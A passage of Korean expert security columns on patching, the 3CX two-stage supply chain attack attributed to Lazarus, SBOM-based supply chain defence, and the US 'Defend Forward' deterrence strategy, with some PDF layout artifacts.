- 사운드 파일 경로 : SMB Server 위한 인증과정 수행
3 획득 정보를 통해 User
접속 및 권한 획득
그림 2-11 취약점을 악용한 공격 도식화
결론
우리는 취약점이 기능의 발전과 함께 발생한다는 것과 보안 담당자가 기업에서 사용하는 모든 솔루션

취약점을 식별하고 패치를 적용하는 것이 불가능하다는 사실을 인정해야 한다. 그러므로 취할 수 있는 최선의
대책이 취약점 패치를 내포한 최신 패치를 적용하는 방법이다.
물론, 최신 패치를 적용한다고 보안 위협이 없어지는 것은 아니다. 새로운 기능은 새로운 취약점의 발생을
야기하기 때문이다. 하지만, 새로운 취약점은 발견하는 과정까지의 시간이 소요된다. 공격자와 방어자
모두에게 새로운 문제이기 때문이다. 실제 랜섬웨어 공격 사례를 통해, 공격 행위는 새로운 취약점을 탐색하고
찾아서 시작되는 것이 아니라 관리 소홀, 기존 취약점 패치 미적용, 구축된 보안 구조의 결함 등을 수단으로
수행한다는 점을 알 수 있다.
기업의 보안 구조와 운영 중인 프로그램은 시간이 지남에 따라 취약점이 발생하는 것이 필연적이다. 이를 악용하는

사고를 예방하는 최선의 대안은 최신 패치 적용이며, 이는 최신 취약점 패치를 내포하는 의미다. 최신 패치 적용은
새로운 문제와 충돌을 야기하기도 하므로 보안 담당자 입장에서는 매번 반복되는 거추장스러운 행위로 생각할 수
있다. 그러나, 패치 미적용은 사고 발생률을 높이고 보안 위협을 증식하는 행위임을 명심해야 한다.
42
전문가 칼럼
Part. 2
3CX 연쇄 소프트웨어
공급망 공격 사건과 고려대학교 SW보안연구소
최윤성 교수
2-3 시사점 (과기부 SW공급망보안포럼 정책·산업분과장)
(2중 공급망 침해사고 분석 및 라자루스 그룹과의 연관성)
지난 3월 말부터 인터넷에 폭로되기 시작한 미국 VoIP 업체 '3CX'의 SW 공급망 침해 사고에는 몇 가지 특징이 있다.
1) 서로 다른 2개의 SW 공급망을 통해 악성코드가 전파된 것이 확인된 최초의 사례이고, 2) 초기에 알려진 것과 달리
단순한 정보 탈취(InfoStealer)용 악성코드가 아닌 모듈 확장형 백도어를 통한 맞춤형 공격이었으며, 3) 과거 암호화폐
거래소를 노린 애플제우스(AppleJeus) 활동과의 연관성으로 북한 배후 해킹그룹 라자루스(Lazarus)의 소행으로
추정된다는 것이다. 악의적인 코드 수정을 통해 SW 배포 인프라의 취약한 연결 부위를 노리는 수법은 악성코드
전파력이 매우 높아 예전부터도 활용되었지만, 최근에는 SW 공급망의 복잡도가 더욱 증가함에 따라 피해 범위와
대상이 확대되고 있어 공동의 대책 마련이 필요하다.
그림 3-1 현대적인 소프트웨어 전송로(Pipeline)와 공격 벡터

출처: cycode.com
43
전문가 칼럼
1. SW 공급망으로 확대되는 공격 벡터
소프트웨어 공급망(Software Supply Chain)은 SW의 초기 개발부터 배포 및 업데이트 지원까지의 절차와 활동을
포함해 SW 생산, 유통, 유지 관리에 이르는 전 과정을 의미한다.
NetSarang(2017), VeraPort(2020) 등 과거의 SW 공급망 공격은 크게 두 단계가 결합된 것이었다. 먼저 SW 빌드

과정에 악성코드를 주입하는 1단계와 업데이트 등의 배포 시스템을 통해 악성코드가 최종 피해자에 도달하면 명령
및 제어(C&C) 서버를 통해 데이터 도용과 같은 실제 공격을 지시하는 2단계이다. 1단계에서 Log4j와 같은 SW
구성요소(Component)의 취약점을 악용해 SW 공급망 프로세스 또는 관련 서비스를 손상하거나 중단시킨다면,
2단계에서는 SW 제품 또는 SW 사용자에 대한 고의적인 적대 행위로 후속 공격을 가능하게 만든다. 공격자는 SW
자체 또는 SW 구성요소의 종속성(Dependency)을 교란하여, SW 고객사의 시스템도 추가로 악용할 수 있다.
그림 3-2 전통적인 SW 공급망 공격의 예시

출처: techbullion.com
공격자가 사용자 PC 환경의 SW 응용 프로그램에 악성코드를 주입하는 것은 SW 공급망의 오래된 공격

벡터(Vector)지만, 최근의 SW 공급망은 부품에 해당하는 컴포넌트 개발업체 및 시스템 통합(System Integration)
협력사 그리고 공개 SW 생태계(Ecosystem)까지 범위가 확장되어, 외부의 ‘제3자 위험(3rd Party Risk)’으로부터 전체
SW 개발 생명주기를 보호하기가 매우 어려워졌다. 또한 애자일(Agile) 방법론, 클라우드 네이티브(Cloud-Native)
아키텍처, 오픈소스 SW의 재사용 등으로 개발 민첩성(Agility)이 향상됨에 따라 SW 개발과 관련된 패키지 리파지토리,
CI/CD 파이프라인 및 SW 빌드(Build)와 배포(Deploy) 관련 인프라 및 자동화 도구로 공격 벡터가 확대되고 있다.1)
1) 차세대 공급망 공격(SonarType, 2023): 종속성 혼동(Dependency Confusion), 악성코드 주입(Malicious Code Injection),
타이포스쿼팅(Typosquatting), 프로테스트웨어(Protestware)
44
전문가 칼럼
그림 3-3 오픈소스 SW 프로젝트와 차세대 공급망 공격 증가율

출처: SonarType (2022)
45
전문가 칼럼
2. 3CX 연쇄 소프트웨어 공급망 공격
3CX 공급망 공격 히스토리

언론에 공개된 주요 자료를 살펴보면, 보안업체 맨디언트(Mandiant)는 2023년 3월 3CX가 연쇄 SW 공급망 공격으로
침해되었다고 발표했다. 첫 번째 침해는 같은 미국 회사인 Trading Technologies의 엑스트레이더(X_TRADER)
SW 패키지로 2021년경 악성코드에 감염되었으며, 3CX 직원은 22년 10월 이전에 X_TRADER를 설치하여 감염된
것으로 추정된다.
X_TRADER는 금융 거래 SW이고, 3CX는 기업용 화상 회의 SW를 개발하는 회사라 두 기업 간의 직접적인 연관이

없지만, 같은 공격자는 X_TRADER 악성 SW 패키지가 설치된 3CX 직원 컴퓨터를 통해 3CX 빌드 서버에 악성코드를
주입하는 이중(Dual) 공급망 공격에 성공했다.
그림 3-4 3CX 연쇄 SW 공급망 공격 개요도

출처: Mandiant
46
전문가 칼럼
Date Description
(SentinelOne) 3CX DesktopAPP의 비정상 행동을 탐지하고, 설치프로그램이 동작하는 것을

막기 위해 기본 격리 조치를 시행함
2023-03-22
(Sentinel One) 최초 GitHub에서 Base64 데이터가 추가된 ICO 파일을 가져오는 것이 공격
체인의 첫 단계이며, 이후 다단계로 이루어진 인포스틸러 DLL로 분석함
2023-03-30 (SentinelOne) MACOS 설치 프로그램의 감염 확인
(Kaspersky) 단순 인포스틸러가 아니라 3CX 공급망 공격을 통해 배포된 백도어(Gopuram)

2023-04-03
분석을 통해 북한 배후와 연관성 발표
(Mandiant) 3CX의 내부 조사를 통해 TRADER_X를 통한 초기 침해와 두 개 공급망 공격의

2023-04-20 연관성을 확인하였고, 2018년부터 이어온 CISA의 AppleJeus 분석과 연관하여 북한 배후
공격으로 지목함
표 3-1 3CX DesktopApp 공급망 공격의 주요 일지
X_TRADER의 악성 패키지는 코드 서명 인증서가 만료된 지난해 10월 이전에 3CX에 설치된 것으로 추정된다. 그
후 VEILED_SIGNAL이라는 백도어가 생성되었고, 공격자에게 3CX 직원 컴퓨터에 대한 전체 관리 및 시스템 권한을
부여하는 악성코드가 설치되었다. 공격자는 3CX 직원의 컴퓨터를 장악한 후, 내부 시스템에 접근할 수 있는 자격
증명을 도용해, 관리자로서 3CX DesktopApp의 윈도우 및 맥(Mac) 버전의 빌드 서버에 침투했다.
빌드 서버 해킹으로 영향을 받은 버전은 총 6개로, 공격자는 도구를 활용해 3CX 기업용 버전에도 악성코드를
주입하였다. 이후 침해 사실을 인지한 3CX CISO는 홈페이지를 통해 영향을 받는 정확한 버전, 시스템 침해 범위,
업데이트 계획, 후속 대책 논의를 위한 포럼 페이지 등을 공지했다.
47
전문가 칼럼
그림 3-5 3CX DesktopApp의 침해 사실을 고지하는 홈페이지

출처: 3cx.com
48
전문가 칼럼
북한의 전형적인 악성코드가 아니다

Mandiant는 X_TRADER를 공격한 주체(UNC4736으로 명명)가 애플제우스(AppleJeus) 활동과 관련이 있다고
추정했으며, 미국 CISA는 애플제우스가 2018년부터 암호화폐 거래소 및 금융 서비스 회사를 노린 활동으로 북한
배후의 라자루스 그룹과 연관되었다고 평가했다. UNC4736 또는 라자루스는 금전 이익을 노리는 그룹으로 암호화폐
및 핀테크 서비스에 대한 공격에 중점을 두고 있다고 밝혔다.
또한 “SW 공급망이 연쇄적으로 공격 받았다는 것은 북한 해커의 역량이 지속해 증가하고 있다는 것을 의미한다. 북한
공격자들은 악성코드를 개발하고 유포하는 독창적인 방법(예: GitHub의 *.ico 파일에 C&C URL을 인코딩한 후 이를
다운로드하여 탐지를 피함, [그림 5] 참조)을 사용하고 있으며, 네트워크 간 이동을 통해 감염 범위를 확대하고 있다”고 했다.
그림 3-6 아이콘 파일의 ‘$’ 이후 바이트에 C&C URL을 숨김

출처: SentinelOne
카스퍼스키는 3CX DesktopApp 샘플에서 2020년 동남아시아의 암호화폐 기업 조사에서도 발견된 라자루스의
백도어(Gopuram)를 발견했다. 구글의 위협분석그룹(TAG)도 감염된 X_TRADER가 배포되기 전인 2022년 3월에
이와 같은 내용의 분석 보고서를 공개한 바 있어, 북한 배후 연결에 신뢰성을 더했다. 참고로 Gopuram은 대상
시스템에 필요한 추가 페이로드를 내려받아 기능을 확장하는 모듈 확장형 백도어이다. 모듈 확장형 백도어의 출현은
2016년 러시아 배후의 해킹 그룹이 우크라이나의 변전소를 공격하고 당시 침해 대상의 맞춤형 제어 프로토콜을
추가로 다운로드하는 Industroyer(2016) 악성코드 프레임워크를 개발했을 때로 거슬러 올라간다.
SW 공급망의 무기화 가능성

SW 공급망 공격은 한 번의 공격으로 수십만 대, 수백만 대의 컴퓨터를 악성코드로 감염시키는 파급력이 있다.
전 세계를 경악시킨 러시아 배후 악성코드 NotPetya(2017) 사건과 중국 해커그룹(Barium)2)도 SW 공급망을 주로
활용하는 것으로 알려져 있다. 또한 이들 그룹은 1단계 공격 시 향후 추가로 이용할 가능성이 있는 피해자에게만
2단계 스파이웨어를 남겨두는 치밀함을 보였으며, 단순히 현재의 이익에만 치중하는 공격 행위가 아님도 알 수 있다.
이렇게 공격자들이 기술을 발전시키고 지속해서 SW 공급망을 해킹함에 따라 시스템 무결성은 손상되고, SW를
신뢰하는 기본 메커니즘(Mechanism)이 더욱 약화하고 있다. 이것은 보안 취약점이나 이메일 피싱을 통한 사이버
공격보다 우리 삶에 더 큰 영향을 미치며, 궁극적으로 SW 업데이트나 공급업체를 신뢰하지 못하도록 만들 수 있다.
2) 분석 그룹의 명명에 따라 Barium 또는 ShadowHammer, ShadowPad 또는 Wicked Panda로도 알려져 있으며, NetSarang(2017),
CCleaner(2017) 및 ASUS(2019) 공격의 유사성으로 중국 배후 해킹 그룹으로 분류됨 (WIRED, 2019)
49
전문가 칼럼
3. SW 공급망 방어의 중요성과 시사점
복잡한 SW 공급망의 책임 추적성

3CX DesktopApp은 채팅, 영상통화, 음성통화 등 커뮤니케이션 기능을 제공하는 기업용 소프트웨어로 전 세계 60만
개 이상의 기업에서 사용되고 있으며 안랩 ASEC에 의해 국내에서도 감염 사례가 확인됐다. 1차 공급망 침해가
발생한 X_TRADER는 2020년에 지원 종료된 앱인데 2022년에도 공식 사이트에서 다운로드가 가능했다. 가장 큰
문제는 서로 다른 SW 공급망이 악성코드 침해로 얽히면서 책임 소재가 모호해지고 추적이 어려워졌다는 것이다.
사고 조사를 담당했던 Mandiant, CrowdStrike, Kaspersky 역시 3CX 침해로 인한 구체적인 피해를 분석 중이라고만
밝혔고, X_TRADER 개발사는 악성 버전을 설치한 3CX 직원이 자사 고객이 아니며, 앱의 지원이 중단된 이후에
발생한 사고라는 이유로 대응에 소극적이다.
SBOM과 공급망 방어 전략
우리는 현대 디지털 인프라의 사회적 중요성에 비해 SW 개발 및 유통 채널의 보호 기능이 미비하고 경계망 방어
등 사후 대응에도 한계가 있음을 체감하고 있다. SW 공급망의 보안성과 신뢰성이 이슈로 대두되고 있는 상황에서
앞으로 SW 공급망의 중요성은 더욱 커질 것이며, 시간이 지날수록 연쇄 공급망 공격으로 인한 피해자가 더 많이
나타날 것은 명백하다.
최근 미국, 유럽연합, 일본 등 SW 시장이 큰 선진국들은 '제3자 리스크' 관리를 목표로 SW 공급망을 보호하기
위해 노력하고 있다. 특히 미국은 바이든 대통령의 행정명령(EO 14028, 2022)과 국가 사이버보안 전략(National
Cybersecurity Strategy, 2023)을 통해 ‘안전하지 않은 SW와 서비스에 대한 제조업체의 책임’을 강조했다. 현재
백악관 관리예산실(OMB)과 FDA를 선두로 논의되는 SW 공급망에 대한 보안 요구사항은 크게 두 가지로 요약할 수
있다. 1) SW 개발 및 배포 프로세스의 취약점 패치 등 업데이트를 위한 보안 개발 생명주기(S-SDLC)3) 관리 체계의
구축과 2) SW 부품명세표(SBOM) 제출로 회자하는 구성요소의 투명성 및 책임 추적성의 향상이다.
3) S-SDLC: Secure Software Development Life Cycle
50
전문가 칼럼
그림 3-7 SW 부품명세표(SBOM)의 개념적 예시
SBOM4)은 구성요소의 종속성(Dependency) 목록이며, 이러한 SBOM의 활성화는 보안 분석가를 위한 SW 투명성을

높이고, 구성요소의 가시성도 확보하는 이점이 있다. 특히 Log4j와 같은 구성요소가 시스템에 얼마나 널리 분포되어
있는지를 빠르게 감지하고, 효율적인 패치 계획을 위한 의사결정 데이터도 제공할 것이 기대된다. 따라서 가치사슬
내의 공급망에서 SBOM이 어느 정도 성숙할 때까지 지속해 적용해야 하며, 가치사슬을 공유하는 기업들은 공급망
방어를 위한 협력 의식을 갖고 참여하는 것이 중요하다. 이를 위해 SW 공급망의 상위 기업과 SW 사용자는 SW 개발
프로세스 보안 관리 등 공급망 안전에 대한 요구사항을 SW 제조사에 전달해야 한다.
4) SBOM: Software Bill of Materials
51
전문가 칼럼
시사점 및 맺음말
타사 구성요소를 사용해 경계망을 넘는 공급망 공격을 완벽하게 방어하기는 어렵지만, 아티팩트(Artifact) 분석을
통한 공격자 탐지 및 추적 기술도 나날이 발전하고 있다. 다만, SW 투명성 확보를 위한 감사(Audit) 기능을 지나치게
강조하는 것은 보안 기밀성을 저해할 수 있기 때문에 분석의 정확성을 높이는 기술과의 연구개발을 병행해야 한다.
또한 중소기업 위주로 형성된 국내 보안 시장을 감안하여, SBOM 확산을 위한 인센티브 제도도 마련되어야 한다.
그림 3-8 Security versus Transparency (Cappelli et al. 2010)
향후 미국과 EU의 SBOM 제출 요구는 무역장벽이자 SW 품질관리에 대한 규제로 해석할 수 있다. 앞선 사례에서
공격자는 SW 공급망의 모든 단계에 침투하여 개발 자산을 훼손하거나, 개인정보를 도용할 가능성이 있으므로 SW
기업은 공급망 안전을 유지하기 위한 보안대책과 모니터링 체계를 수립하여 대비해야 한다. SW 엔지니어는 보안의
특성을 이해하고 개발자에 친화적인 자동화 도구를 구축하여 취약성이 SW 품질을 손상하는 것을 방지해야 한다.
향후 보안 전문가와 SW 개발팀 간의 협업으로 성숙한 S-SDLC 구축의 중요성이 강조되어, 개발자 커뮤니티를 통한
보안 문화의 확산도 기대한다.
52
전문가 칼럼
그림 3-9 전체 SDLC를 보호하기 위한 DevSecOps 도구 선택

출처: Gartner
글로벌 거대 IT 기업의 보안 산업에 대한 영향력이 점차 커지는 현실에서 보안 품질의 향상은 결국 SW 제작 비용의

증가로 이어지기 때문에 우리의 경쟁력과 현실에 맞는 대응 전략이 매우 중요하다. 단순히 책임을 강화하는 것이
비판의 도구나 처벌의 크기가 되어서는 안 된다. 자연스럽게 책임을 공유하고 빠르게 대책을 적용하는 SW 보안
문화를 만드는 것이 중요하며, 앞으로 SW 개발 혁신의 자유로움과 보안 정보공유의 폐쇄성을 어떻게 연결하느냐는
공급망 보안 정책의 관건이다. 라이선스 위반 가능성이 있는 오픈소스 SW 사용과 경제적 이슈로 수정이 어려운
취약점을 공유하는 부분은 정부와 민간이 함께 나서서 풀어야 한다. OpenSSF의 Alpha-Omega, GitHub의 SigStore
등 최근 글로벌 IT 기업들이 오픈소스 SW의 보안 강화를 위해 대규모 투자를 한 프로젝트 사례는 참고할 만하다.
우리 과학기술정보통신부는 신뢰할 수 있는 제3자 구성요소 검증기관과 자동화 플랫폼을 통한 공급망 보안
지원체계 구축을 추진하고 있다. 인재가 가장 큰 자원인 우리는 멀티클라우드, SaaS 등 다양한 시스템 아키텍처가
급부상하는 시대인 만큼 전문적인 보안 컨설팅 역량을 키우기 위한 교육 프로그램의 개발도 뒤따라야 할 것이다.
53
전문가 칼럼
종합하면 소프트웨어 공급망 방어의 시작은 관련된 산업 전반의 연대를 강화하는 것으로 축약할 수 있다. SW
보안 품질에 대한 인식 변화를 통해 내부 위험관리 조직과 컨트롤 타워를 만들고, 다양한 이해관계자를 위한 협력
프로세스 구축으로 모두가 합심해야 할 때이다.
출처
•“Software Supply Chain Security: Your Attack Surface Is Bigger Than You Think”, cycode.com, 2022.02
•“Supply Chain Security: Protecting Your Data from Third-Party Risk”, TechBullion.com, 2023.02
•“8th Annual State of the Software Supply Chain”, SonarType, 2023
•“SmoothOperator | Ongoing Campaign Trojanizes 3CXDesktopApp in a Supply Chain Attack”,
SentinelOne, 2023.03
•“Not just an infostealer: Gopuram backdoor deployed through 3CX supply chain attack“
Kaspersky, 2023.03
•“3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise;
Suspected North Korean Actor Responsible”, Mandiant, 2023.04
•CISA’s Analysis Report “MAR-10322463-5.v1 - AppleJeus: CoinGoTrade”,
https://www.cisa.gov/news-events/analysis-reports/ar21-048e
•Google Updates from Threat Analysis Group (TAG), “Countering threats from North Korea”, 2022.03
•“The Huge 3CX Breach Was Actually 2 Linked Supply Chain Attacks”, WIRED, 2023.04
•“A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree”, WIRED, 2019.05
•“How to Select DevSecOps Tools for Secure Software Delivery”, Gartner, 2023.01
•최윤성(2022), 미국의 소프트웨어 공급망 보안 정책 동향: SBOM 사례를 중심으로, 정보보호학회지,
제32권 제5호, pp. 7-14
54
전문가 칼럼
Part. 2
사이버 억지력 강화를 위한

「Defend Forward」 한국전자통신연구원
2-4 전략의 이해 사이버보안연구본부 김익균
서 론
국은 자국을 위협하는 주요 요인들 중, 제1순위로 외부로부터의 사이버 공격을 인정하고 있고, 전 지구적으로는
미
중국, 러시아 및 적대 국가의 공세가 커짐에 따라 사이버공간의 안전성을 확보하기 위해 국가 차원의 사이버 안보
전략을 수립해 왔다.
근 미 국방부는 새로운 사이버 안보전략을 미 의회에 제출하였고, 지난달 5월에 이와 관련된 ‘Fact Sheet’를 공개
최
하면서 조만간 요약 보고서를 제공할 것이라고 하였다.1) 이는 2018년 국가 사이버 안보전략 및 대통령 안보메모,
대통령 정책지침 등을 통해 그동안 발전시켜오던 ‘선제적 방어’(defend forward)전략을 포함할 것으로 이해된다.
efend Forward 개념은 공격적인 사고 방식으로 방어하고, 악의적인 사이버 활동을 초기 단계에서 선제적으로
D
방해하거나 중지하며, 적의 비용을 증가시키는 사이버 전략을 의미한다.
전략 개념은 2018년 미 사이버 사령부 비전(Command Vision for US Cyber Command), 국방부 사이버 전략
이
(DOD Cyber Strategy), 2020년 사이버 솔라리움위원회 최종 보고서(Cyberspace Solarium Commission Final
Report) 등 각종 사이버 전략 보고서에도 명시되어 있고, ‘23년 최근 발표한 국가 사이버 안보전략(National-
Cybersecurity-Strategy-2023)의 ’위협 행위자에 대한 적극적인 대응’2)과 연계된다.
국 애틀랜틱위원회(Atlantic Council)에서 지난해 3월 발간한 ‘미국 사이버 전략의 다음 단계를 준비하는 방안’
미
(Preparing the next phase of US cyber strategy)3) 보고서에서는 ＇Defend Forward’ 전략이 공격 억지의 유효성이
얼마나 있는가에 대해 찬반의 의견을 조망하고 있지만, 현재까지도 미국 사이버 억지 전략의 핵심 키워드로
자리하고 있다.
고에서는 2020년 사이버 솔라리움보고서에서 정리하고 있는 ‘사이버 억지 전략’의 개념을 살펴보고, 억지

본
전략에서 다루는 선제적 방어(Defend Forward)전략을 민간 및 공공 영역에서 어떻게 준비하고 있는지와 함께
관련 기술에 대한 한국의 연구&개발 방향성에 대해 살펴보고자 한다.
1) https://defensescoop.com/2023/05/26/dod-sends-new-cyber-strategy-to-congress-releases-unclassified-fact-sheet/
2) Pillar II: Disrupt and dismantle thereat actor
3) https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/preparing-the-next-phase-of-us-cyber-strategy/
55
전문가 칼럼
1. 사이버 억지 개념과 Defend Forward 전략의 의미
국은 2001년 부시 행정부 이래 20여년간 사이버 공간의 안전을 위한 국가 전략을 발표해 왔다. 2018년
미
트럼프 정부에서는 ‘사이버 국방전략’4)을 통해 미국의 기반시설을 대상으로 한 악의적 사이버 활동의 선제
제압(preempt), 무력화(defeat), 억지(deter)하고 무력을 사용하여 악의적 사이버 활동을 억지하겠다고 밝힌바
있다.
국방부가 악의적 사이버 활동과 그 원천을 방해하거나 중지하기 위해 무력 분쟁 수준 이하의 대응을 포함한
미
선제적 방어(defend forward)를 수행할 것임을 강조하였고, 이어 최근 바이든 행정부는 defend forward 개념을
보다 강화하는 방향으로 전개되고 있다
020년 발표된 솔라리움 위원회 보고서5)에서는 사이버 보안에 대한 새로운 전략적 접근 방식인 계층화된
2
사이버 억지를 제시하고 있고, 아래 그림과 같이 Defend Forward 개념이 잘 도식화되어 있다. 계층화된 사이버
억지가 지향하는 최종 목표는 심각한 결과를 초래할 사이버 공격 가능성과 영향이 최종 대상지에서는 그 효과를
최소화 시키는 것이다.
그림 4-2 솔라리움 위원회의 계층화된 사이버 억지 개념 1

출처: 미 사이버 스패이스 솔라리움 위원회 보고서
4) https://media.defense.gov/2018/Sep/18/2002041658/-1/-1/1/CYBER_STRATEGY_SUMMARY_FINAL.PDF
5) Cyberspace solarium commission report 2020, https://www.solarium.gov/report
56
전문가 칼럼
(Layer1. Shape Behavior) 공동 행동의 결성 사이버 공간에서 책임 있는 행동을 촉진하기 위해 동맹국 및

파트너와 협력하는 것
(Layer2. Deny Benefits) 적 이익의 제거 소규모 비용으로 사이버 공간을 자신에게 유리하도록 악용하여
얻어지는 이익을 제거하는 것. 이 접근 방식은 국가 회복력을 촉진하고 사이버 생태계의 보안을 강화하기
위해 민간 부문과 협력하는 네트워크 확보를 중시함
(Layer3. Impose Costs) 대가 부과 사이버 공간에서 미국을 표적으로 삼는 행위자에 대해 그 대가를 치를
수 있도록 보복하는데 필요한 능력, 역량 및 신뢰성을 유지하는 것
에서 설명한 세 가지 방법은 각각 적이 미국의 이익을 공격하기 위해 사이버 공간을 사용하는 비용과 이익을
위
인식하는 방식을 변경하여 미국의 공공 및 민간 부문 보안을 강화하는 각 억지 계층을 표현하고 있다.
세 계층에는 사이버 억지 전략을 구현하기 위한 수단을 제공하는 6개의 정책 기둥(Pillar)과 그 아래 75개

이
이상의 정책 권장 사항으로 구성되어 있다. 아래와 같이 이 개념을 명확하게 만드는 두 가지 핵심 사항이 있다.
첫째, 사이버 공간을 통해 적들이 목표로 삼을 수 있는 각종 취약성을 줄이면 미국의 이익을 공격할 기회가
제거된다.
둘째, 사이버 공간에서 공격의 빈도와 심각성을 줄이기 위해 "Defend Forward"의 개념을 통합 적용한다.
, Defend Forward 개념은 진행 중인 사이버 공격자의 선제행동을 방해하고 무력화시키기 위해 적의 작전을

즉
사전에 관찰, 추적 및 대응하고 그 비용을 부과함을 가정한다. 이 자세는 물리적 파괴나 인력 피해를 초래하지
않는 무력 충돌 수준 이하의 사이버 공격에도 정부가 모든 방법을 사용하여 국제법에 따라 적들에게 대응할
것임을 포함한다.
그림 4-3 솔라리움 위원회의 계층화된 사이버 억지 개념 2
*출처: 미 사이버 스패이스 솔라리움 위원회 보고서6)
6) Cyberspace solarium commission report 2020, https://www.solarium.gov/report
57
전문가 칼럼
층화된 사이버 억지 개념의 핵심 아이디어는 간단하다. 미국의 이익에 반하는 사이버 공격을 계획할 때
계
적이 예상하는 비용은 늘리고 이익은 줄이는 것입니다. 이는 공공 및 민간 부문에서 동시적으로(concurrent),
지속적으로(continuous), 협력적(collaborative)으로 여러 억지 메커니즘을 사용함으로써 달성할 수 있다.
(Entanglement/Norms) 첫 번째 계층에서 파트너 및 동맹국과 함께 공동의 이익과 가치를 기반으로
사이버 규범을 공동으로 개발하고 구현한다. 이 계층의 조치에는 외교, 법 집행 협력, 새로운 위협 벡터 및
취약성에 대한 정보 공유가 포함된다.
(Denial) 두 번째 계층에서 정부는 민간 부문과 협력하여 취약성을 줄이고 적의 이익을 제거한다. 이 억지

계층의 전략은 적이 리소스, 액세스 및 기능과 관련하여 어려운 선택을 하도록 강제하는 것이다.
(Punishment) 세 번째 계층에서 분쟁을 억지하기 위해 비용을 부과하고, 악의적인 적의 행동을 무력 충돌

수준 이하로 제한하며, 필요한 경우 모든 능력을 사용하여 전쟁에서 승리할 준비를 하는 것이다. 이를 위해
정부는 모든 권력 수단을 사용하여 대가를 치룰 수 있는 능력을 입증해야 한다.
에, Defend Forward는 악의적인 사이버 활동에 관여하는 적에게 대가를 부과하기 위해 사이버 공간에서
이
지속적으로 관여할 수 있는 능력을 보유하기를 요구한다. 비용 부과 계층은 또한 정부가 선택한 시간과 장소에서
군사력으로 대응할 수 있는 능력을 보호할 것을 요구한다.
2. 민간 영역의 Defend forward 해석 및 구현
근 민간 영역에서 기업들을 위해 Cyber Defenders Council7)을 구성하여 "Defend Forward＂로 알려진 사이버
최
억지 전략을 채택하고, 조직이 공격자의 비용을 늘리고 방어자의 효율성을 개선하는 Defend forward 사이버 보안
전략을 구현하는 데 도움이 되는 규범적 지침을 제공하려고 한다.
“ Make it EXPENSIVE, Make it DANGEROUS, Make it WORTHLESS”. 이는 영국 통신 기업 BT가 구축한 보안

프로그램의 설계 원칙이다. 공격자가 공격을 성공적으로 수행하는 데 막대한 비용이 들도록 하고, 시도하는
것 자체가 법적으로 위험하도록 하며, 민감한 데이터를 가치 없는 대상으로 만들어 공격자의 금전적 이익을
제거하고자 했다. 이 BT의 프로그램은 Defend Forward로 알려진 사이버 보안에 대한 새로운 접근 방식과
관련성이 높다. 이 접근 방식은 억지, 정보 공유 및 공격적인 사고 방식으로 방어하는 데 더 중점을 두고 있는
것이다.
한, 19대 미 합참의장인 조셉 던포드가 Defend Forward 개념에 대해 아래와 같이 시사하였다. “Defend

또
Forward는 해킹을 의미할 필요는 없지만 위협 정보를 기반으로 위협을 예측하고 방해하기 위해 사전 예방적
목적을 가지고 행동하는 것을 의미한다. 방어자가 잡히지 않고 공격자를 제압하는 것이다. 공격적인 사고
방식으로 방어하는 것이며 놀랍게도 이 사고 방식은 불법이 아니다.“
7) https://www.cybereason.com/cyber-defenders-council
58
전문가 칼럼
yber Defenders Council의 해석 또한, 국방부 사이버 전략에 설명된 대로 Defend Forward는 악의적인 사이버
C
활동이 목표에 도달하기 전에 선제적으로 방해하거나 중지하는 것을 의미한다. 이 접근 방식은 아래 세부 사항을
포함한다.
정보(INTELLIGENCE) 적의 전술, 기술 및 절차(TTP: tactics, techniques, and procedures)에 대한 정보
수집
탄력성(RESILIENCY) 시스템과 네트워크의 보안을 강화하여 적들이 목표를 달성하는 것을 더 어렵게

만들고 더 많은 비용이 들게 하며 가능한 경우 공격 시도를 저지
협력(COLLABORATION) 불법적 반격을 제외한 공세적 방어를 강화하기 위해 산업 분야 간, 공공 부문과

민간 부문 간에 법 집행 기관들과 긴밀히 협력
능력(CAPABILITIES) 적의 행동 및 활동에 대응하기 위해 확장 가능하고 적응 가능하며 합법적이고 다양한

능력을 개발
분석(ANALYTICS) 기업 사이버 보안 솔루션을 사용하여 기계 속도로 작동하고 대규모 데이터 분석과

결합하여 이질적인 네트워크 및 시스템 자산 전반에 걸쳐 초기 단계에서 악의적인 활동을 식별
efend Forward 전략은 2018년과 마찬가지로 오늘날 사이버 보안 전략과 관련이 있으며, 특히 세계가 러시아와
D
우크라이나 간의 분쟁으로 인한 사이버 공격에 대비하고 있는 것과 이어지고 있다. Defend Forward에 대한
국방부의 정의에는 민간 기업이 참여할 수 없는 공격 활동이 포함되지만, 민간 부문은 능동적인 "적과의 싸움"
관점과 억지력에 중점을 두는 것 양쪽 모두에서 교훈을 얻을 수 있다.
도적인 글로벌 조직은 이미 Defend Forward 원칙을 채택하는 방향으로 나아가고 있다. EC3(European
선
Cybercrime Center)8)의 전략 책임자인 Philipp Amann은 Defend Forward가 사이버 공격자를 처리할 때
EC3에서 지원하는 선제적이고 억지 중심적인 접근 방식과 일치한다고 했다. 예를 들어, Amann은 조직이
공격자에게 몸값을 지불하지 않고 데이터를 복구할 수 있도록 지원하는 No More Ransom 이니셔티브와 함께
악의적인 행위자가 새로운 기술을 남용할 수 있는 방법을 평가하기 위해 EC3가 설립한 규제 및 기술 감시
기능을 인용했다.
찬가지로 BT의 명예 CSO이자 Protect BT Services & Operations의 전 이사인 Steve Benton에 따르면 BT의
마
보안 프로그램은 공격을 저지하기 위한 세 가지 목표를 중심으로 구축되었다고 했다.
값비싼 대가를 치루게 하라 적이 회사를 성공적으로 공격하기 위해서는 비싼 비용을 치루게 하라
적을 위험하게 하라 강력한 디지털 포렌식 팀을 통해 법 집행 파트너가 행위자를 식별하고 정의를 내릴 수

있도록 하는 증거를 수집할 수 있다.
공격에 가치없도록하라 저장 또는 이동 중인 귀중한 데이터를 암호화하고 고객을 피해로부터 보호하기

위한 사전 조치를 취함으로써 적에게 위협을 가한다.
8) https://www.europol.europa.eu/about-europol/european-cybercrime-centre-ec3
59
전문가 칼럼
래는 Cyber Defenders Council에서 정리한 Defend Forward의 여섯 가지 원칙이다.

아
항상 위험에 처해 있다고 가정하라 "블랙 스완"처럼 보다 개연성이 희박한 다양한 시나리오에 대비하는 데
투자하도록 조직의 고위 경영진을 설득한다. NotPetya9) 또는 Colonial Pipeline 사고10) 수준으로 심각해지는
또 다른 공격을 원하지 않기에 ISACS11) 및 Cyber Defenders Council과 같은 산업 조직이 해당 산업에 대한
위협 시나리오를 사전 준비할 것을 권장한다.
